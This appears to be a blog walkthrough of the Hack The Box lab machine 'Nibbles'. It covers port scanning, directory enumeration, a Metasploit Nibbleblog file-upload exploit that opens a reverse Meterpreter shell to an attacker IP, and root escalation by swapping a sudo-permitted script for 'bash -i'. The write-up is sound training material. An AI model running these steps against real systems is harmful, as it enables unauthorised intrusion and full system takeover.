Nibbles

Enumeration

NMAP

The nmap scan reveals 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s see what’s the WebApp like.

We’re greeted by a Hello World! message.

The source code of the page reveals a directory.

Dirbuster

Using dirbuster, I have found files within /nibbleblog/content/private/config.xml directory and was able to enumerate possible users:

I also found a feed.php file which let me into researching if it was a possible attack vector. The research led me into finding this interesting article about feed.php and XSS. – Feed Injection In Web

Anyway.. while it was an interesting find, I did not see how it would apply here. So i continued looking.

Searchsploit

I was going nowhere until i simply typed:

searchsploit nibble
-----------------------------------------------------------------Exploit Title                                                                     |  Path
-------------------------------------------------------------------
Nibbleblog 3 - Multiple SQL Injections                                             | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                              | php/remote/38489.rb
-------------------------------------------------------------------
Shellcodes: No Results

Ahh, it looks we have hit. Let’s try metasploit:

msf6 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload

I have used the previously enumerated username:password == admin:nibbles:

msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Sending stage (39282 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.75:32812) at 2021-04-09 08:00:26 -0400

In the following lines I am interacting with the shell. Finally I have discovered interesting file that is with 777 rights.

meterpreter > shell
Process 1587 created.
Channel 0 created.
whoami
nibbler
python3 -c 'import pty;pty.spawn("/bin/bash")' 
[email protected]:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler
<ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler            
[email protected]:/home/nibbler$ ls
ls
personal.zip  user.txt
[email protected]:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  
[email protected]:/home/nibbler$ cd personal/stuff/
cd personal/stuff/
[email protected]:/home/nibbler/personal/stuff$ file monitor.sh
file monitor.sh
monitor.sh: ASCII text
[email protected]:/home/nibbler/personal/stuff$ ll
ll
ll: command not found
[email protected]:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

Catting the file revealed nothing interesting tho. After some time, I tried:

sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

AHA! This is our gate to escalating privileges. I have removed the unzipped file and instead uploaded a simple bash script:

[email protected]:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh

I could not use any editors on the machine, so i Had to create it locally and upload it to the victim.

meterpreter > upload monitor.sh
[*] uploading  : /home/kali/Desktop/monitor.sh -> monitor.sh
[*] Uploaded -1.00 B of 21.00 B (-4.76%): /home/kali/Desktop/monitor.sh -> monitor.sh
[*] uploaded   : /home/kali/Desktop/monitor.sh -> monitor.sh

I have moved the file to /home/nibbler/personal/stuff and execute the following commands to gain root:

cat monitor.sh
bash -i
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh 
bash: cannot set terminal process group (1360): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: